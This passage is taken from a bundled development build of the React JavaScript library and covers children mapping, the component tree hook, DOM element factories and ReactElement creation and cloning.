mapContext) {\n  this.result = mapResult;\n  this.keyPrefix = keyPrefix;\n  this.func = mapFunction;\n  this.context = mapContext;\n  this.count = 0;\n}\nMapBookKeeping.prototype.destructor = function () {\n  this.result = null;\n  this.keyPrefix = null;\n  this.func = null;\n  this.context = null;\n  this.count = 0;\n};\nPooledClass.addPoolingTo(MapBookKeeping, fourArgumentPooler);\n\nfunction mapSingleChildIntoContext(bookKeeping, child, childKey) {\n  var result = bookKeeping.result,\n      keyPrefix = bookKeeping.keyPrefix,\n      func = bookKeeping.func,\n      context = bookKeeping.context;\n\n\n  var mappedChild = func.call(context, child, bookKeeping.count++);\n  if (Array.isArray(mappedChild)) {\n    mapIntoWithKeyPrefixInternal(mappedChild, result, childKey, emptyFunction.thatReturnsArgument);\n  } else if (mappedChild != null) {\n    if (ReactElement.isValidElement(mappedChild)) {\n      mappedChild = ReactElement.cloneAndReplaceKey(mappedChild,\n      // Keep both the (mapped) and old keys if they differ, just as\n      // traverseAllChildren used to do for objects as children\n      keyPrefix + (mappedChild.key && (!child || child.key !== mappedChild.key) ? escapeUserProvidedKey(mappedChild.key) + '/' : '') + childKey);\n    }\n    result.push(mappedChild);\n  }\n}\n\nfunction mapIntoWithKeyPrefixInternal(children, array, prefix, func, context) {\n  var escapedPrefix = '';\n  if (prefix != null) {\n    escapedPrefix = escapeUserProvidedKey(prefix) + '/';\n  }\n  var traverseContext = MapBookKeeping.getPooled(array, escapedPrefix, func, context);\n  traverseAllChildren(children, mapSingleChildIntoContext, traverseContext);\n  MapBookKeeping.release(traverseContext);\n}\n\n/**\n * Maps children that are typically specified as `props.children`.\n *\n * See https://facebook.github.io/react/docs/top-level-api.html#react.children.map\n *\n * The provided mapFunction(child, key, index) will be called for each\n * leaf child.\n *\n * @param {?*} children Children tree container.\n * @param {function(*, int)} func The map function.\n * @param {*} context Context for mapFunction.\n * @return {object} Object containing the ordered map of results.\n */\nfunction mapChildren(children, func, context) {\n  if (children == null) {\n    return children;\n  }\n  var result = [];\n  mapIntoWithKeyPrefixInternal(children, result, null, func, context);\n  return result;\n}\n\nfunction forEachSingleChildDummy(traverseContext, child, name) {\n  return null;\n}\n\n/**\n * Count the number of children that are typically specified as\n * `props.children`.\n *\n * See https://facebook.github.io/react/docs/top-level-api.html#react.children.count\n *\n * @param {?*} children Children tree container.\n * @return {number} The number of children.\n */\nfunction countChildren(children, context) {\n  return traverseAllChildren(children, forEachSingleChildDummy, null);\n}\n\n/**\n * Flatten a children object (typically specified as `props.children`) and\n * return an array with appropriately re-keyed children.\n *\n * See https://facebook.github.io/react/docs/top-level-api.html#react.children.toarray\n */\nfunction toArray(children) {\n  var result = [];\n  mapIntoWithKeyPrefixInternal(children, result, null, emptyFunction.thatReturnsArgument);\n  return result;\n}\n\nvar ReactChildren = {\n  forEach: forEachChildren,\n  map: mapChildren,\n  mapIntoWithKeyPrefixInternal: mapIntoWithKeyPrefixInternal,\n  count: countChildren,\n  toArray: toArray\n};\n\nmodule.exports = ReactChildren;\n},{\"2\":2,\"26\":26,\"28\":28,\"9\":9}],6:[function(_dereq_,module,exports){\n/**\n * Copyright 2016-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(25);\n\nvar ReactCurrentOwner = _dereq_(7);\n\nvar invariant = _dereq_(30);\nvar warning = _dereq_(31);\n\nfunction isNative(fn) {\n  // Based on isNative() from Lodash\n  var funcToString = Function.prototype.toString;\n  var hasOwnProperty = Object.prototype.hasOwnProperty;\n  var reIsNative = RegExp('^' + funcToString\n  // Take an example native function source for comparison\n  .call(hasOwnProperty\n  // Strip regex characters so we can use it for regex\n  ).replace(/[\\\\^$.*+?()[\\]{}|]/g, '\\\\$&'\n  // Remove hasOwnProperty from the template to make it generic\n  ).replace(/hasOwnProperty|(function).*?(?=\\\\\\()| for .+?(?=\\\\\\])/g, '$1.*?') + '$');\n  try {\n    var source = funcToString.call(fn);\n    return reIsNative.test(source);\n  } catch (err) {\n    return false;\n  }\n}\n\nvar canUseCollections =\n// Array.from\ntypeof Array.from === 'function' &&\n// Map\ntypeof Map === 'function' && isNative(Map) &&\n// Map.prototype.keys\nMap.prototype != null && typeof Map.prototype.keys === 'function' && isNative(Map.prototype.keys) &&\n// Set\ntypeof Set === 'function' && isNative(Set) &&\n// Set.prototype.keys\nSet.prototype != null && typeof Set.prototype.keys === 'function' && isNative(Set.prototype.keys);\n\nvar setItem;\nvar getItem;\nvar removeItem;\nvar getItemIDs;\nvar addRoot;\nvar removeRoot;\nvar getRootIDs;\n\nif (canUseCollections) {\n  var itemMap = new Map();\n  var rootIDSet = new Set();\n\n  setItem = function (id, item) {\n    itemMap.set(id, item);\n  };\n  getItem = function (id) {\n    return itemMap.get(id);\n  };\n  removeItem = function (id) {\n    itemMap['delete'](id);\n  };\n  getItemIDs = function () {\n    return Array.from(itemMap.keys());\n  };\n\n  addRoot = function (id) {\n    rootIDSet.add(id);\n  };\n  removeRoot = function (id) {\n    rootIDSet['delete'](id);\n  };\n  getRootIDs = function () {\n    return Array.from(rootIDSet.keys());\n  };\n} else {\n  var itemByKey = {};\n  var rootByKey = {};\n\n  // Use non-numeric keys to prevent V8 performance issues:\n  // https://github.com/facebook/react/pull/7232\n  var getKeyFromID = function (id) {\n    return '.' + id;\n  };\n  var getIDFromKey = function (key) {\n    return parseInt(key.substr(1), 10);\n  };\n\n  setItem = function (id, item) {\n    var key = getKeyFromID(id);\n    itemByKey[key] = item;\n  };\n  getItem = function (id) {\n    var key = getKeyFromID(id);\n    return itemByKey[key];\n  };\n  removeItem = function (id) {\n    var key = getKeyFromID(id);\n    delete itemByKey[key];\n  };\n  getItemIDs = function () {\n    return Object.keys(itemByKey).map(getIDFromKey);\n  };\n\n  addRoot = function (id) {\n    var key = getKeyFromID(id);\n    rootByKey[key] = true;\n  };\n  removeRoot = function (id) {\n    var key = getKeyFromID(id);\n    delete rootByKey[key];\n  };\n  getRootIDs = function () {\n    return Object.keys(rootByKey).map(getIDFromKey);\n  };\n}\n\nvar unmountedIDs = [];\n\nfunction purgeDeep(id) {\n  var item = getItem(id);\n  if (item) {\n    var childIDs = item.childIDs;\n\n    removeItem(id);\n    childIDs.forEach(purgeDeep);\n  }\n}\n\nfunction describeComponentFrame(name, source, ownerName) {\n  return '\\n    in ' + (name || 'Unknown') + (source ? ' (at ' + source.fileName.replace(/^.*[\\\\\\/]/, '') + ':' + source.lineNumber + ')' : ownerName ? ' (created by ' + ownerName + ')' : '');\n}\n\nfunction getDisplayName(element) {\n  if (element == null) {\n    return '#empty';\n  } else if (typeof element === 'string' || typeof element === 'number') {\n    return '#text';\n  } else if (typeof element.type === 'string') {\n    return element.type;\n  } else {\n    return element.type.displayName || element.type.name || 'Unknown';\n  }\n}\n\nfunction describeID(id) {\n  var name = ReactComponentTreeHook.getDisplayName(id);\n  var element = ReactComponentTreeHook.getElement(id);\n  var ownerID = ReactComponentTreeHook.getOwnerID(id);\n  var ownerName;\n  if (ownerID) {\n    ownerName = ReactComponentTreeHook.getDisplayName(ownerID);\n  }\n  \"development\" !== 'production' ? warning(element, 'ReactComponentTreeHook: Missing React element for debugID %s when ' + 'building stack', id) : void 0;\n  return describeComponentFrame(name, element && element._source, ownerName);\n}\n\nvar ReactComponentTreeHook = {\n  onSetChildren: function (id, nextChildIDs) {\n    var item = getItem(id);\n    !item ? \"development\" !== 'production' ? invariant(false, 'Item must have been set') : _prodInvariant('144') : void 0;\n    item.childIDs = nextChildIDs;\n\n    for (var i = 0; i < nextChildIDs.length; i++) {\n      var nextChildID = nextChildIDs[i];\n      var nextChild = getItem(nextChildID);\n      !nextChild ? \"development\" !== 'production' ? invariant(false, 'Expected hook events to fire for the child before its parent includes it in onSetChildren().') : _prodInvariant('140') : void 0;\n      !(nextChild.childIDs != null || typeof nextChild.element !== 'object' || nextChild.element == null) ? \"development\" !== 'production' ? invariant(false, 'Expected onSetChildren() to fire for a container child before its parent includes it in onSetChildren().') : _prodInvariant('141') : void 0;\n      !nextChild.isMounted ? \"development\" !== 'production' ? invariant(false, 'Expected onMountComponent() to fire for the child before its parent includes it in onSetChildren().') : _prodInvariant('71') : void 0;\n      if (nextChild.parentID == null) {\n        nextChild.parentID = id;\n        // TODO: This shouldn't be necessary but mounting a new root during in\n        // componentWillMount currently causes not-yet-mounted components to\n        // be purged from our tree data so their parent id is missing.\n      }\n      !(nextChild.parentID === id) ? \"development\" !== 'production' ? invariant(false, 'Expected onBeforeMountComponent() parent and onSetChildren() to be consistent (%s has parents %s and %s).', nextChildID, nextChild.parentID, id) : _prodInvariant('142', nextChildID, nextChild.parentID, id) : void 0;\n    }\n  },\n  onBeforeMountComponent: function (id, element, parentID) {\n    var item = {\n      element: element,\n      parentID: parentID,\n      text: null,\n      childIDs: [],\n      isMounted: false,\n      updateCount: 0\n    };\n    setItem(id, item);\n  },\n  onBeforeUpdateComponent: function (id, element) {\n    var item = getItem(id);\n    if (!item || !item.isMounted) {\n      // We may end up here as a result of setState() in componentWillUnmount().\n      // In this case, ignore the element.\n      return;\n    }\n    item.element = element;\n  },\n  onMountComponent: function (id) {\n    var item = getItem(id);\n    !item ? \"development\" !== 'production' ? invariant(false, 'Item must have been set') : _prodInvariant('144') : void 0;\n    item.isMounted = true;\n    var isRoot = item.parentID === 0;\n    if (isRoot) {\n      addRoot(id);\n    }\n  },\n  onUpdateComponent: function (id) {\n    var item = getItem(id);\n    if (!item || !item.isMounted) {\n      // We may end up here as a result of setState() in componentWillUnmount().\n      // In this case, ignore the element.\n      return;\n    }\n    item.updateCount++;\n  },\n  onUnmountComponent: function (id) {\n    var item = getItem(id);\n    if (item) {\n      // We need to check if it exists.\n      // `item` might not exist if it is inside an error boundary, and a sibling\n      // error boundary child threw while mounting. Then this instance never\n      // got a chance to mount, but it still gets an unmounting event during\n      // the error boundary cleanup.\n      item.isMounted = false;\n      var isRoot = item.parentID === 0;\n      if (isRoot) {\n        removeRoot(id);\n      }\n    }\n    unmountedIDs.push(id);\n  },\n  purgeUnmountedComponents: function () {\n    if (ReactComponentTreeHook._preventPurging) {\n      // Should only be used for testing.\n      return;\n    }\n\n    for (var i = 0; i < unmountedIDs.length; i++) {\n      var id = unmountedIDs[i];\n      purgeDeep(id);\n    }\n    unmountedIDs.length = 0;\n  },\n  isMounted: function (id) {\n    var item = getItem(id);\n    return item ? item.isMounted : false;\n  },\n  getCurrentStackAddendum: function (topElement) {\n    var info = '';\n    if (topElement) {\n      var name = getDisplayName(topElement);\n      var owner = topElement._owner;\n      info += describeComponentFrame(name, topElement._source, owner && owner.getName());\n    }\n\n    var currentOwner = ReactCurrentOwner.current;\n    var id = currentOwner && currentOwner._debugID;\n\n    info += ReactComponentTreeHook.getStackAddendumByID(id);\n    return info;\n  },\n  getStackAddendumByID: function (id) {\n    var info = '';\n    while (id) {\n      info += describeID(id);\n      id = ReactComponentTreeHook.getParentID(id);\n    }\n    return info;\n  },\n  getChildIDs: function (id) {\n    var item = getItem(id);\n    return item ? item.childIDs : [];\n  },\n  getDisplayName: function (id) {\n    var element = ReactComponentTreeHook.getElement(id);\n    if (!element) {\n      return null;\n    }\n    return getDisplayName(element);\n  },\n  getElement: function (id) {\n    var item = getItem(id);\n    return item ? item.element : null;\n  },\n  getOwnerID: function (id) {\n    var element = ReactComponentTreeHook.getElement(id);\n    if (!element || !element._owner) {\n      return null;\n    }\n    return element._owner._debugID;\n  },\n  getParentID: function (id) {\n    var item = getItem(id);\n    return item ? item.parentID : null;\n  },\n  getSource: function (id) {\n    var item = getItem(id);\n    var element = item ? item.element : null;\n    var source = element != null ? element._source : null;\n    return source;\n  },\n  getText: function (id) {\n    var element = ReactComponentTreeHook.getElement(id);\n    if (typeof element === 'string') {\n      return element;\n    } else if (typeof element === 'number') {\n      return '' + element;\n    } else {\n      return null;\n    }\n  },\n  getUpdateCount: function (id) {\n    var item = getItem(id);\n    return item ? item.updateCount : 0;\n  },\n\n\n  getRootIDs: getRootIDs,\n  getRegisteredIDs: getItemIDs,\n\n  pushNonStandardWarningStack: function (isCreatingElement, currentSource) {\n    if (typeof console.reactStack !== 'function') {\n      return;\n    }\n\n    var stack = [];\n    var currentOwner = ReactCurrentOwner.current;\n    var id = currentOwner && currentOwner._debugID;\n\n    try {\n      if (isCreatingElement) {\n        stack.push({\n          name: id ? ReactComponentTreeHook.getDisplayName(id) : null,\n          fileName: currentSource ? currentSource.fileName : null,\n          lineNumber: currentSource ? currentSource.lineNumber : null\n        });\n      }\n\n      while (id) {\n        var element = ReactComponentTreeHook.getElement(id);\n        var parentID = ReactComponentTreeHook.getParentID(id);\n        var ownerID = ReactComponentTreeHook.getOwnerID(id);\n        var ownerName = ownerID ? ReactComponentTreeHook.getDisplayName(ownerID) : null;\n        var source = element && element._source;\n        stack.push({\n          name: ownerName,\n          fileName: source ? source.fileName : null,\n          lineNumber: source ? source.lineNumber : null\n        });\n        id = parentID;\n      }\n    } catch (err) {\n      // Internal state is messed up.\n      // Stop building the stack (it's just a nice to have).\n    }\n\n    console.reactStack(stack);\n  },\n  popNonStandardWarningStack: function () {\n    if (typeof console.reactStackEnd !== 'function') {\n      return;\n    }\n    console.reactStackEnd();\n  }\n};\n\nmodule.exports = ReactComponentTreeHook;\n},{\"25\":25,\"30\":30,\"31\":31,\"7\":7}],7:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n/**\n * Keeps track of the current owner.\n *\n * The current owner is the component who should own any components that are\n * currently being constructed.\n */\nvar ReactCurrentOwner = {\n  /**\n   * @internal\n   * @type {ReactComponent}\n   */\n  current: null\n};\n\nmodule.exports = ReactCurrentOwner;\n},{}],8:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactElement = _dereq_(9);\n\n/**\n * Create a factory that creates HTML tag elements.\n *\n * @private\n */\nvar createDOMFactory = ReactElement.createFactory;\nif (\"development\" !== 'production') {\n  var ReactElementValidator = _dereq_(11);\n  createDOMFactory = ReactElementValidator.createFactory;\n}\n\n/**\n * Creates a mapping from supported HTML tags to `ReactDOMComponent` classes.\n *\n * @public\n */\nvar ReactDOMFactories = {\n  a: createDOMFactory('a'),\n  abbr: createDOMFactory('abbr'),\n  address: createDOMFactory('address'),\n  area: createDOMFactory('area'),\n  article: createDOMFactory('article'),\n  aside: createDOMFactory('aside'),\n  audio: createDOMFactory('audio'),\n  b: createDOMFactory('b'),\n  base: createDOMFactory('base'),\n  bdi: createDOMFactory('bdi'),\n  bdo: createDOMFactory('bdo'),\n  big: createDOMFactory('big'),\n  blockquote: createDOMFactory('blockquote'),\n  body: createDOMFactory('body'),\n  br: createDOMFactory('br'),\n  button: createDOMFactory('button'),\n  canvas: createDOMFactory('canvas'),\n  caption: createDOMFactory('caption'),\n  cite: createDOMFactory('cite'),\n  code: createDOMFactory('code'),\n  col: createDOMFactory('col'),\n  colgroup: createDOMFactory('colgroup'),\n  data: createDOMFactory('data'),\n  datalist: createDOMFactory('datalist'),\n  dd: createDOMFactory('dd'),\n  del: createDOMFactory('del'),\n  details: createDOMFactory('details'),\n  dfn: createDOMFactory('dfn'),\n  dialog: createDOMFactory('dialog'),\n  div: createDOMFactory('div'),\n  dl: createDOMFactory('dl'),\n  dt: createDOMFactory('dt'),\n  em: createDOMFactory('em'),\n  embed: createDOMFactory('embed'),\n  fieldset: createDOMFactory('fieldset'),\n  figcaption: createDOMFactory('figcaption'),\n  figure: createDOMFactory('figure'),\n  footer: createDOMFactory('footer'),\n  form: createDOMFactory('form'),\n  h1: createDOMFactory('h1'),\n  h2: createDOMFactory('h2'),\n  h3: createDOMFactory('h3'),\n  h4: createDOMFactory('h4'),\n  h5: createDOMFactory('h5'),\n  h6: createDOMFactory('h6'),\n  head: createDOMFactory('head'),\n  header: createDOMFactory('header'),\n  hgroup: createDOMFactory('hgroup'),\n  hr: createDOMFactory('hr'),\n  html: createDOMFactory('html'),\n  i: createDOMFactory('i'),\n  iframe: createDOMFactory('iframe'),\n  img: createDOMFactory('img'),\n  input: createDOMFactory('input'),\n  ins: createDOMFactory('ins'),\n  kbd: createDOMFactory('kbd'),\n  keygen: createDOMFactory('keygen'),\n  label: createDOMFactory('label'),\n  legend: createDOMFactory('legend'),\n  li: createDOMFactory('li'),\n  link: createDOMFactory('link'),\n  main: createDOMFactory('main'),\n  map: createDOMFactory('map'),\n  mark: createDOMFactory('mark'),\n  menu: createDOMFactory('menu'),\n  menuitem: createDOMFactory('menuitem'),\n  meta: createDOMFactory('meta'),\n  meter: createDOMFactory('meter'),\n  nav: createDOMFactory('nav'),\n  noscript: createDOMFactory('noscript'),\n  object: createDOMFactory('object'),\n  ol: createDOMFactory('ol'),\n  optgroup: createDOMFactory('optgroup'),\n  option: createDOMFactory('option'),\n  output: createDOMFactory('output'),\n  p: createDOMFactory('p'),\n  param: createDOMFactory('param'),\n  picture: createDOMFactory('picture'),\n  pre: createDOMFactory('pre'),\n  progress: createDOMFactory('progress'),\n  q: createDOMFactory('q'),\n  rp: createDOMFactory('rp'),\n  rt: createDOMFactory('rt'),\n  ruby: createDOMFactory('ruby'),\n  s: createDOMFactory('s'),\n  samp: createDOMFactory('samp'),\n  script: createDOMFactory('script'),\n  section: createDOMFactory('section'),\n  select: createDOMFactory('select'),\n  small: createDOMFactory('small'),\n  source: createDOMFactory('source'),\n  span: createDOMFactory('span'),\n  strong: createDOMFactory('strong'),\n  style: createDOMFactory('style'),\n  sub: createDOMFactory('sub'),\n  summary: createDOMFactory('summary'),\n  sup: createDOMFactory('sup'),\n  table: createDOMFactory('table'),\n  tbody: createDOMFactory('tbody'),\n  td: createDOMFactory('td'),\n  textarea: createDOMFactory('textarea'),\n  tfoot: createDOMFactory('tfoot'),\n  th: createDOMFactory('th'),\n  thead: createDOMFactory('thead'),\n  time: createDOMFactory('time'),\n  title: createDOMFactory('title'),\n  tr: createDOMFactory('tr'),\n  track: createDOMFactory('track'),\n  u: createDOMFactory('u'),\n  ul: createDOMFactory('ul'),\n  'var': createDOMFactory('var'),\n  video: createDOMFactory('video'),\n  wbr: createDOMFactory('wbr'),\n\n  // SVG\n  circle: createDOMFactory('circle'),\n  clipPath: createDOMFactory('clipPath'),\n  defs: createDOMFactory('defs'),\n  ellipse: createDOMFactory('ellipse'),\n  g: createDOMFactory('g'),\n  image: createDOMFactory('image'),\n  line: createDOMFactory('line'),\n  linearGradient: createDOMFactory('linearGradient'),\n  mask: createDOMFactory('mask'),\n  path: createDOMFactory('path'),\n  pattern: createDOMFactory('pattern'),\n  polygon: createDOMFactory('polygon'),\n  polyline: createDOMFactory('polyline'),\n  radialGradient: createDOMFactory('radialGradient'),\n  rect: createDOMFactory('rect'),\n  stop: createDOMFactory('stop'),\n  svg: createDOMFactory('svg'),\n  text: createDOMFactory('text'),\n  tspan: createDOMFactory('tspan')\n};\n\nmodule.exports = ReactDOMFactories;\n},{\"11\":11,\"9\":9}],9:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(32);\n\nvar ReactCurrentOwner = _dereq_(7);\n\nvar warning = _dereq_(31);\nvar canDefineProperty = _dereq_(18);\nvar hasOwnProperty = Object.prototype.hasOwnProperty;\n\nvar REACT_ELEMENT_TYPE = _dereq_(10);\n\nvar RESERVED_PROPS = {\n  key: true,\n  ref: true,\n  __self: true,\n  __source: true\n};\n\nvar specialPropKeyWarningShown, specialPropRefWarningShown;\n\nfunction hasValidRef(config) {\n  if (\"development\" !== 'production') {\n    if (hasOwnProperty.call(config, 'ref')) {\n      var getter = Object.getOwnPropertyDescriptor(config, 'ref').get;\n      if (getter && getter.isReactWarning) {\n        return false;\n      }\n    }\n  }\n  return config.ref !== undefined;\n}\n\nfunction hasValidKey(config) {\n  if (\"development\" !== 'production') {\n    if (hasOwnProperty.call(config, 'key')) {\n      var getter = Object.getOwnPropertyDescriptor(config, 'key').get;\n      if (getter && getter.isReactWarning) {\n        return false;\n      }\n    }\n  }\n  return config.key !== undefined;\n}\n\nfunction defineKeyPropWarningGetter(props, displayName) {\n  var warnAboutAccessingKey = function () {\n    if (!specialPropKeyWarningShown) {\n      specialPropKeyWarningShown = true;\n      \"development\" !== 'production' ? warning(false, '%s: `key` is not a prop. Trying to access it will result ' + 'in `undefined` being returned. If you need to access the same ' + 'value within the child component, you should pass it as a different ' + 'prop. (https://fb.me/react-special-props)', displayName) : void 0;\n    }\n  };\n  warnAboutAccessingKey.isReactWarning = true;\n  Object.defineProperty(props, 'key', {\n    get: warnAboutAccessingKey,\n    configurable: true\n  });\n}\n\nfunction defineRefPropWarningGetter(props, displayName) {\n  var warnAboutAccessingRef = function () {\n    if (!specialPropRefWarningShown) {\n      specialPropRefWarningShown = true;\n      \"development\" !== 'production' ? warning(false, '%s: `ref` is not a prop. Trying to access it will result ' + 'in `undefined` being returned. If you need to access the same ' + 'value within the child component, you should pass it as a different ' + 'prop. (https://fb.me/react-special-props)', displayName) : void 0;\n    }\n  };\n  warnAboutAccessingRef.isReactWarning = true;\n  Object.defineProperty(props, 'ref', {\n    get: warnAboutAccessingRef,\n    configurable: true\n  });\n}\n\n/**\n * Factory method to create a new React element. This no longer adheres to\n * the class pattern, so do not use new to call it. Also, no instanceof check\n * will work. Instead test $$typeof field against Symbol.for('react.element') to check\n * if something is a React Element.\n *\n * @param {*} type\n * @param {*} key\n * @param {string|object} ref\n * @param {*} self A *temporary* helper to detect places where `this` is\n * different from the `owner` when React.createElement is called, so that we\n * can warn. We want to get rid of owner and replace string `ref`s with arrow\n * functions, and as long as `this` and owner are the same, there will be no\n * change in behavior.\n * @param {*} source An annotation object (added by a transpiler or otherwise)\n * indicating filename, line number, and/or other information.\n * @param {*} owner\n * @param {*} props\n * @internal\n */\nvar ReactElement = function (type, key, ref, self, source, owner, props) {\n  var element = {\n    // This tag allow us to uniquely identify this as a React Element\n    $$typeof: REACT_ELEMENT_TYPE,\n\n    // Built-in properties that belong on the element\n    type: type,\n    key: key,\n    ref: ref,\n    props: props,\n\n    // Record the component responsible for creating this element.\n    _owner: owner\n  };\n\n  if (\"development\" !== 'production') {\n    // The validation flag is currently mutative. We put it on\n    // an external backing store so that we can freeze the whole object.\n    // This can be replaced with a WeakMap once they are implemented in\n    // commonly used development environments.\n    element._store = {};\n\n    // To make comparing ReactElements easier for testing purposes, we make\n    // the validation flag non-enumerable (where possible, which should\n    // include every environment we run tests in), so the test framework\n    // ignores it.\n    if (canDefineProperty) {\n      Object.defineProperty(element._store, 'validated', {\n        configurable: false,\n        enumerable: false,\n        writable: true,\n        value: false\n      });\n      // self and source are DEV only properties.\n      Object.defineProperty(element, '_self', {\n        configurable: false,\n        enumerable: false,\n        writable: false,\n        value: self\n      });\n      // Two elements created in two different places should be considered\n      // equal for testing purposes and therefore we hide it from enumeration.\n      Object.defineProperty(element, '_source', {\n        configurable: false,\n        enumerable: false,\n        writable: false,\n        value: source\n      });\n    } else {\n      element._store.validated = false;\n      element._self = self;\n      element._source = source;\n    }\n    if (Object.freeze) {\n      Object.freeze(element.props);\n      Object.freeze(element);\n    }\n  }\n\n  return element;\n};\n\n/**\n * Create and return a new ReactElement of the given type.\n * See https://facebook.github.io/react/docs/top-level-api.html#react.createelement\n */\nReactElement.createElement = function (type, config, children) {\n  var propName;\n\n  // Reserved names are extracted\n  var props = {};\n\n  var key = null;\n  var ref = null;\n  var self = null;\n  var source = null;\n\n  if (config != null) {\n    if (hasValidRef(config)) {\n      ref = config.ref;\n    }\n    if (hasValidKey(config)) {\n      key = '' + config.key;\n    }\n\n    self = config.__self === undefined ? null : config.__self;\n    source = config.__source === undefined ? null : config.__source;\n    // Remaining properties are added to a new props object\n    for (propName in config) {\n      if (hasOwnProperty.call(config, propName) && !RESERVED_PROPS.hasOwnProperty(propName)) {\n        props[propName] = config[propName];\n      }\n    }\n  }\n\n  // Children can be more than one argument, and those are transferred onto\n  // the newly allocated props object.\n  var childrenLength = arguments.length - 2;\n  if (childrenLength === 1) {\n    props.children = children;\n  } else if (childrenLength > 1) {\n    var childArray = Array(childrenLength);\n    for (var i = 0; i < childrenLength; i++) {\n      childArray[i] = arguments[i + 2];\n    }\n    if (\"development\" !== 'production') {\n      if (Object.freeze) {\n        Object.freeze(childArray);\n      }\n    }\n    props.children = childArray;\n  }\n\n  // Resolve default props\n  if (type && type.defaultProps) {\n    var defaultProps = type.defaultProps;\n    for (propName in defaultProps) {\n      if (props[propName] === undefined) {\n        props[propName] = defaultProps[propName];\n      }\n    }\n  }\n  if (\"development\" !== 'production') {\n    if (key || ref) {\n      if (typeof props.$$typeof === 'undefined' || props.$$typeof !== REACT_ELEMENT_TYPE) {\n        var displayName = typeof type === 'function' ? type.displayName || type.name || 'Unknown' : type;\n        if (key) {\n          defineKeyPropWarningGetter(props, displayName);\n        }\n        if (ref) {\n          defineRefPropWarningGetter(props, displayName);\n        }\n      }\n    }\n  }\n  return ReactElement(type, key, ref, self, source, ReactCurrentOwner.current, props);\n};\n\n/**\n * Return a function that produces ReactElements of a given type.\n * See https://facebook.github.io/react/docs/top-level-api.html#react.createfactory\n */\nReactElement.createFactory = function (type) {\n  var factory = ReactElement.createElement.bind(null, type);\n  // Expose the type on the factory and the prototype so that it can be\n  // easily accessed on elements. E.g. `<Foo />.type === Foo`.\n  // This should not be named `constructor` since this may not be the function\n  // that created the element, and it may not even be a constructor.\n  // Legacy hook TODO: Warn if this is accessed\n  factory.type = type;\n  return factory;\n};\n\nReactElement.cloneAndReplaceKey = function (oldElement, newKey) {\n  var newElement = ReactElement(oldElement.type, newKey, oldElement.ref, oldElement._self, oldElement._source, oldElement._owner, oldElement.props);\n\n  return newElement;\n};\n\n/**\n * Clone and return a new ReactElement using element as the starting point.\n * See https://facebook.github.io/react/docs/top-level-api.html#react.cloneelement\n */\nReactElement.cloneElement = function (element, config, children) {\n  var propName;\n\n  // Original props are copied\n  var props = _assign({}, element.props);\n\n  // Reserved names are extracted\n  var key = element.key;\n  var ref = element.ref;\n  // Self is preserved since the owner is preserved.\n  var self = element._self;\n  // Source is preserved since cloneElement is unlikely to be targeted by a\n  // transpiler, and the original source is probably a better indicator of the\n  // true owner.\n  var source = element._source;\n\n  // Owner will be preserved, unless ref is overridden\n  var owner = element._owner;\n\n  if (config != null) {\n    if (hasValidRef(config)) {\n      // Silently steal the ref from the parent.\n      ref = config.ref;\n      owner = ReactCurrentOwner.current;\n    }\n    if (hasValidKey(config)) {\n      key = '' + config.key;\n    }\n\n    // Remaining properties override existing props\n    var defaultProps;\n    if (element.type && element.type.defaultProps) {\n      defaultProps = element.type.defaultProps;\n    }\n    for (propName in config) {\n      if (hasOwnProperty.call(config, propName) && !RESERVED_PROPS.hasOwnProperty(propName)) {\n        if (config[propName] === undefined && defaultProps !== undefined) {\n          // Resolve default props\n          props[propName] = defaultProps[propName];\n        } else {\n          props[propName] = config[propName];\n        }\n      }\n    }\n  }\n\n  // Children can be more than one argument, and those are transferred onto\n  // the newly allocated props object.\n  var childrenLength = arguments.length - 2;\n  if (childrenLength === 1) {\n    props.children = children;\n  } else if (childrenLength > 1) {\n    var childArray = Array(childrenLength);\n    for (var i = 0; i < childrenLength; i++) {\n      childArray[i] = arguments[i + 2];\n    }\n    props.children = childArray;\n  }\n\n  return ReactElement(element.type, key, ref, self, source, owner, props);\n};\n\n/**\n * Verifies the object is a ReactElement.\n * See https://facebook.github.io/react/docs/top-level-api.html#react.isvalidelement\n * @param {?object} object\n * @return {boolean} True if `object` is a valid component.\n * @final\n */\nReactElement.isValidElement = function (object) {\n  return typeof object === 'object' && object !== null && object.$$typeof === REACT_ELEMENT_TYPE;\n};\n\nmodule.exports = ReactElement;\n},{\"10\":10,\"18\":18,\"31\":31,\"32\":32,\"7\":7}],10:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n// The Symbol used to tag the ReactElement type. If there is no native Symbol\n// nor polyfill, then a plain number is used for performance.\n\nvar REACT_ELEMENT_TYPE = typeof Symbol === 'function' && Symbol['for'] && Symbol['for']('react.element') || 0xeac7;\n\nmodule.exports = REACT_ELEMENT_TYPE;\n},{}],11:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n/**\n * ReactElementValidator provides a wrapper around a element factory\n * which validates the props passed to the element. This is intended to be\n * used only in DEV and could be replaced by a static type checker for languages\n * that support it.\n */\n\n'use strict';\n\nvar ReactCurrentOwner = _dereq_(7);\nvar ReactComponentTreeHook = _dereq_(6);\nvar ReactElement = _dereq_(9);\n\nvar checkReactTypeSpec = 